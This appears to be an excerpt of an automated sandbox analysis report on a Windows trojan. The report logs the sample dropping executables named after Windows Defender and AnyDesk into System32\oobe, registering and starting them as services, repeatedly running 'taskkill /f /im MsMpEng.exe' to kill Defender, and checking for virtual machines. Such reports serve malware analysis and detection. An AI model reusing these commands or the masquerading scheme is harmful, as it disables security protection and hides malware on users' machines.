Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: 25_2_00007FF71DDB32B4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 25_2_00007FF71DDB32B4
Source: MicrosoftWindowsDefenderCoreService.exe, 00000005.00000002.2168899269.000002466387E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD0
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.000002762097C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
Source: SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe, 00000000.00000002.2170001507.00000276209F6000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3386691306.000001F7B1727000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000002.3387008885.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.3381908245.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2516905564.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp, MicrosoftWindowsDefenderCoreService.exe, 00000011.00000003.2452617242.000001F7B179E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C787478C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6C787478C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C7887C50 GetProcessHeap, 0_2_00007FF6C7887C50
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C787478C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6C787478C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C78685D4 SetUnhandledExceptionFilter, 0_2_00007FF6C78685D4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Code function: 0_2_00007FF6C7868430 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF6C7868430
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: 5_2_00007FF76E19C0F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00007FF76E19C0F8
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: 5_2_00007FF76E191484 SetUnhandledExceptionFilter, 5_2_00007FF76E191484
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Code function: 5_2_00007FF76E1912E0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00007FF76E1912E0
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Code function: 7_2_00007FF7AA952FB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00007FF7AA952FB4
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Code function: 7_2_00007FF7AA953194 SetUnhandledExceptionFilter, 7_2_00007FF7AA953194
Source: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe | Code function: 7_2_00007FF7AA956964 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00007FF7AA956964
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: 25_2_00007FF71DD985D4 SetUnhandledExceptionFilter, 25_2_00007FF71DD985D4
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: 25_2_00007FF71DDA478C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_00007FF71DDA478C
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: 25_2_00007FF71DDC0188 SetUnhandledExceptionFilter, 25_2_00007FF71DDC0188
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Code function: 25_2_00007FF71DD98430 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_00007FF71DD98430

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Process created: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe "C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe" install
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exe | Process created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2404
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6636
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 2128
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: unknown unknown
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: unknown unknown
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: unknown unknown
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exeJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreServiceJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\oobe\MicrosoftWindowsDefenderCoreService.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe installJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateServiceJump to behavior
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
